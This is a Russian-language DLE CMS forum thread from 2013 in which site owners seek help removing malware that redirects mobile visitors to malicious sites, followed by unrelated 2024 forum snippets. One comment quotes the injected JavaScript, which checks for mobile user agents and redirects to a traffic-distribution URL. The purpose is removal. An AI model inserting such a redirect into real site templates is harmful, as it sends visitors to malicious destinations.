Задать вопрос
Не нравятся результаты поиска? Попробуйте другой поиск!
DLE FAQ » Все вопросы » Общие вопросы » Вирус на сайте (редирект)

Вирус на сайте (редирект)

     09.10.2013    Все вопросы » Общие вопросы    12517

вопрос
Добрый день всем форумчанам.
На сайте появился вирус - происходит редирект на мобильные устройства или на сайт infected.com.
Что сделал:
Удалили везде скрипты и ссылки на FTP.
Изменил пароли на ftp, админке и на сервере.
Визуально ссылок и скриптов не вижу, но яндек все равно ругается что есть вирус.
При запросе уточнения прислали письмо:
"В настоящее время при заходе на сайт через браузер Opera Mobile происходит перенаправление на вредоносную цель refresh-browser.00xff.net . Проверьте, пожалуйста.
Вредоносный код находится на серверной стороне Вашего сайта, поэтому я не могу указать Вам на него. Советую обратиться в техническую поддержку Вашего хостинг-провайдера."

Вот сам пациент - med-na-dom.com

Кто понимает и может помочь - прошу подсказать где искать вирус и как его убрать.
Бьюсь над этой проблемой уже более месяца.
С уважением Дмитрий.
Заранее благодарю.

Ответил: dj-avtosh

в файле .htaccess лишнее ( файл в корне )

17 комментариев

coolteams
Юзер

coolteams - 9 октября 2013 23:58 -

так в мобильном шаблоне и ищите, и еще переименуйте файл cron.php если двиг нуленый, через него опять зальют.
xpchelkinx
Юзер

xpchelkinx - 10 октября 2013 10:50 -

dj-avtosh спасибо, надеюсь что нашел правильно и удалил. Посмотрю что скажет Яндекс.
xpchelkinx
Юзер

xpchelkinx - 10 октября 2013 10:53 -

coolteams спасибо за замечание. подскажите как правильно переименовать cron.php?
Просто переименовать и все?
Или этот файл с чем то связан?
В сети не нашел ответа на данный вопрос.
dj-avtosh
PHP-developer

dj-avtosh - 11 октября 2013 00:13 -

При чем тут крон, казалось бы. Бесят уже непроверенные советы.
По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.
coolteams
Юзер

coolteams - 11 октября 2013 03:52 -

При том крон! В нуленом двигле в крон запихивают код, которым заливают вирус. Ко мне уже раз сто обращались, чистили полностью все файло, перезаливали, на завтра опять тоже самое, пока крон не переименовали. Бесят когда от балды отписывают, и делают себя умнее всех. 7 лет работы с DLE меня многому научили, если что.
cron-32xnzvsu.php и все дела.
dj-avtosh
PHP-developer

dj-avtosh - 11 октября 2013 16:43 -

1. 7 лет работы с ДЛЕ? :D

2. И вы до сих пор не знаете про айболит и т.п.?

3. Вам чуждо что файлы не переименовываются. А поднимаются логи и латаются дыры.

4. Джумлу Вы тоже будете переименовывать?

5. Да, я умнее Вас. Проверено.
По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.
dj-avtosh
PHP-developer

dj-avtosh - 11 октября 2013 16:46 -

Я Вам на будущее советую внимательно читать вопрос, что бы верно отвечать. Человек, который имеет опыт очистки сайта от вирусов, обязан знать что вирус по обновлению мобильного браузера ( ИМХО опера и т.п. ) прописывает себя в .htaccess

Это сделано только для того, что бы вирус обрабатывался с любой страницы.

Удачи, надеюсь скоро отметите юбилей с ДЛЕ :D
По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.
coolteams
Юзер

coolteams - 11 октября 2013 17:18 -

dj-avtosh я вот читаю ваши сообщения, ни одного! ответа по существу, левые отписки. Нет желания даже с вами спорить, кто умнее.
..и все сообщения ради рекламной подписи.
dj-avtosh
PHP-developer

dj-avtosh - 11 октября 2013 17:20 -

Вы отписываетесь на сайте, который мы писали при отсутствии логики.
По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.
coolteams
Юзер

coolteams - 11 октября 2013 17:33 -

поздравляю, вовесьте баннер сверху
xpchelkinx
Юзер

xpchelkinx - 14 октября 2013 10:56 -

Ответил: dj-avtosh
в файле .htaccess лишнее ( файл в корне )

Я вроде бы удалил, но Яндекс продолжает ругаться. Прошу Вас указать на вредоносный код в htaccess по вашему мнению.
С уважением Дмитрий.
dj-avtosh
PHP-developer

dj-avtosh - 14 октября 2013 11:08 -

Надо в вебмастере задать заявку на переиндексацию и ждать.
По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.
xpchelkinx
Юзер

xpchelkinx - 14 октября 2013 14:24 -

dj-avtosh Дал, ответ пришел что код все еще есть.
По этому и повторно обратился к Вам.
Engel
Юзер

Engel - 16 ноября 2013 21:08 -

Кто поможет? Похожая ситуация, только код немножко другой:

<script type="text/javascript">
<!--
if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){
window.location = "http://webtds1.ru/go.php?sid=1";
}
//-->
</script>

Появляется в шаблоне Smartphone - main.tpl . Быди проверены все файлы и папки сайта (конечно же и .htaccess), все чисто. Удаляю код и через некоторое время (от 4 до 6 часов) код прописывается в шаблоне опять. Яндекс уже второй раз вешает свою метку на сайт.

Помогите, люди добрые!
ПафНутиЙ
Админ

ПафНутиЙ - 17 ноября 2013 00:45 -

Возможно вредоносный код есть в файлах, выполняющихся по крону.
Каков вопрос - таков и ответ. Просто помните об этом.
bembelby
Юзер

bembelby - 17 ноября 2013 10:29 -

Раньше подобный код перенаправления на мобильные устройства я находил у себя нак сайте в файлах website.lng, engine.php, init.php, dbconfig.php
Gabr
Юзер

Gabr - 29 ноября 2013 19:01 -

Столкнулся с такой же бедой, практически - перелопатил все вышеуказанные файлы. Перепробовал все возможные методы от онлайн сервисов до заливания некоторых утилит, сайт Др.Веб все равно ругался и показывал, что есть "вредный" редирект.
Только в website.lng был код. Удалил - все стало замечательно.
Чтобы комментировать - войдите или зарегистрируйтесь на сайте

Похожие вопросы

 13.09.2013 Wizard2030  Общие вопросы
 18.09.2013 Бахмут  Общие вопросы
 11.03.2014 batman_wlad  Общие вопросы
 17.04.2014 xpchelkinx  Общие вопросы
 15.05.2014 Бахмут  Общие вопросы
 06.07.2014 justalex  Общие вопросы
 06.08.2014 ig55555or  Общие вопросы, Общие вопросы по PHP
 15.08.2014 prolight  Общие вопросы
 25.09.2014 Lynat1k  Общие вопросы
 04.12.2014 motonix  Общие вопросы
  • mondolfo | Шаблон waitlogin при авторизации через с ...
    Фото mondolfo
    mondolfo
    Шаблон waitlogin при авторизации через соцсеть?
    Вчера, 01:31
    /engine/modules/social.php
  • TeraMoune | Как изменить вывод custom по нескольким ... 11
    Фото TeraMoune
    TeraMoune
    Как изменить вывод custom по нескольким тегам?
    28-10-2024, 01:05
    Я же написал, продублирую: нужно использовать [[:punct:]]

    И проблема в условии проверяющее версию mysql, можно поменять местами true и false, изменить знак меньше на больше или вовсе убрать код строки с version_compare и оставить ту строку кода $tempArray[] где используется [[:punct:]].

    В статье также указано, что важно использовать экранирование, собственно, что и указано в методе по исправлению ошибки.
    Статья по решению проблемы

    Там у человека совершенно другое условие поиска. Он не теги ищет которые строго разделены запятыми, он просто слова ищет и ему как раз подойдёт граница слова. И это когда-то давно поиск был разделяя по границе слова, теперь есть character_class и используется другой метод. Но это не отменяет того, что вы нашли вопрос и решение которое никак не связано с темой новости поиска новостей с наличием тегов.
  • homa152 | Как изменить вывод custom по нескольким ... 11
    Фото homa152
    homa152
    Как изменить вывод custom по нескольким тегам?
    27-10-2024, 23:33
    Если вы готовы предложить какое-то решение для исправление проблемы 3685, отлично. Иначе к сожалению на последних версиях MySQL хак не рабочий, согласно вашему трактату.
  • homa152 | Как изменить вывод custom по нескольким ... 11
    Фото homa152
    homa152
    Как изменить вывод custom по нескольким тегам?
    27-10-2024, 23:20
    Я буквально 2 часа назад столкнулся с проблемами при установке этого хака, проблема была именно в ошибке 3685, сайт не просто переставал работать, использовалась стандартная заглушка при критических ошибках MySQL исправить получилось методом описанным выше, для версия до 8 хак работает исправно, но выше, требуется доработка, так как синтаксис считается ошибочным, вы можете проверить самостоятельно.

    В статье также указано, что важно использовать экранирование, собственно, что и указано в методе по исправлению ошибки.
    Статья по решению проблемы
  • TeraMoune | Как изменить вывод custom по нескольким ... 11
    Фото TeraMoune
    TeraMoune
    Как изменить вывод custom по нескольким тегам?
    27-10-2024, 22:32
    Напротив нужно использовать [[:punct:]] вместо скобок, про это написано в документации на которую вы ссылаетесь. А \b означает границу слова и не способен правильно отображать результаты. Граница слова это когда выражение будет находить отдельные слова. Например новость имеет теги (Социальная сеть, Блокировка) и tags REGEXP '\\b(сеть)\\b' найдёт новость с тегом Социальная сеть, а так же Рыбацкая сеть и в принципе найдёт все новости где присутствует слово "Сеть" и будет много лишних результатов, а не только нужные.

    В хаке как раз присутствует проверка на старую версию и новую mysql и в каждом случае используется тот вариант который является валидным для используемой версии.
  • homa152 | Как изменить вывод custom по нескольким ... 11
    Фото homa152
    homa152
    Как изменить вывод custom по нескольким тегам?
    27-10-2024, 21:30
    Добавлю касаемо обновления архитектуры MySQL
    При добавлении хака с версии MySQL 8.0, возможно появление ошибки: 3685. Неверный аргумент для регулярного выражения.

    Можно пофиксить самостоятельно внеся корректировки в сам хак из панели админа.

    Строку:
    $tempArray[] = "tags REGEXP '[[:<:]](" . $value  . ")[[:>:]]'";


    Заменить на: 
    $tempArray[] = "tags REGEXP '\\\\b(" . $value  . ")\\\\b'";


    Согласно справочному руководству MySQL 8.0 / ... / Регулярные выражения, «MySQL поддерживает регулярные выражения с помощью международных компонентов для Unicode (ICU)».

    То есть, вместо "[[:<:]] и [[:>:]]", нужно использовать: "\b"
  • vitnet | Есть ли возможность изменить язык сайта? 1
    Фото vitnet
    vitnet
    Есть ли возможность изменить язык сайта?
    25-10-2024, 16:22
    Ну как вариант можно использовать тег {lang text=***} подробнее


    {lang text="LANG_PARAMETER"}

    Данный тег предназначен для вывода информации из языкового файла website.tpl, который в данный момент используется, где LANG_PARAMETER это значение параметра, который необходимо вывести. Например, тег {lang text="attach_images"} выведет надпись “Прикрепить изображения” из языкового пакета, в случае использования русского языка и если используется английский язык, то “Attach Images”
  • vitnet | Есть готовый модуль рейтинга комментарие ... 1
    Фото vitnet
    vitnet
    Есть готовый модуль рейтинга комментариев?
    25-10-2024, 13:12
    Вариант 1 (вручную)

    1.0 Открываете файл engine/modules/show.full.php находите в нем
    $where_approve . " ORDER BY " . PREFIX . "_comments.id " . $comm_msort;

    И меняете здесь id на rating
    Пример:
    $where_approve . " ORDER BY " . PREFIX . "_comments.rating " . $comm_msort;

    2.0 Затем переходите в админку /admin.php?mod=options&action=syscon --> Настройки комментариев --> Порядок сортировки комментариев --> По убыванию

    2.1 Далее --> Тип рейтинга комментариев выставляете "Нравится или Не нравится"

    Готово!

    Вариант 2 (плагин)
    Для просмотра содержимого спойлера, перейдите к выбранному событию.
  • Graf | Как сделать аякс кнопку "загрузить еще"? 2
    Фото Graf
    Graf
    Как сделать аякс кнопку "загрузить еще"?
    23-10-2024, 16:03
    Вот рабочий пример со скрытие пагинатора и кнопки.
    Полный код файла navigation.tpl
    [not-available=userinfo]
<div class="nav-load" id="nav-load">[next-link]Загрузить еще[/next-link]</div>

<nav class="navigation"[available=lastcomments] style="padding: 4% 8%;"[/available]>
	<div class="page_next-prev">
		<span class="page_prev" title="Предыдущая страница">
			[prev-link]<svg class="icon icon-left"><use xlink:href="#icon-left"></use></svg>[/prev-link]
		</span>
		<span class="page_next" title="Следующая страница">
			[next-link]<svg class="icon icon-right"><use xlink:href="#icon-right"></use></svg>[/next-link]
		</span>
	</div>
	<ul class="pagination">
		{pages}
	</ul>
</nav>
<script type="text/javascript">
$(document).ready(function(){
    
         $('body').on('click','#nav-load a',function(){
        var urlNext = $(this).attr('href');
        var scrollNext = $(this).offset().top - 200;
        if (urlNext !== undefined) {
            $.ajax({
                url: urlNext,
                beforeSend: function() {
                    ShowLoading('');
                },            
                success: function(data) {
                    $('.navigation').remove();
                    $('#nav-load').remove();
                    $('#dle-content').append($('#dle-content', data).html());
                    $('#dle-content').after($('#bottom-nav'));
                    window.history.pushState("", "", urlNext);
                    $('html, body').animate({scrollTop:scrollNext}, 800);    
                    HideLoading('');
                },
                  error: function() {                
                    HideLoading('');
                    alert('что-то пошло не так');
                  }
            });
        };
        return false;
    });
    
});
</script>
[/not-available]
  • vitnet | Как перенести категории в DLE? 2
    Фото vitnet
    vitnet
    Как перенести категории в DLE?
    22-10-2024, 11:30
    Для начала проверьте наличие файла /engine/cache/system/category.php и если он был до замены БД то удалите его а ещё лучше очистить кеш.
наверх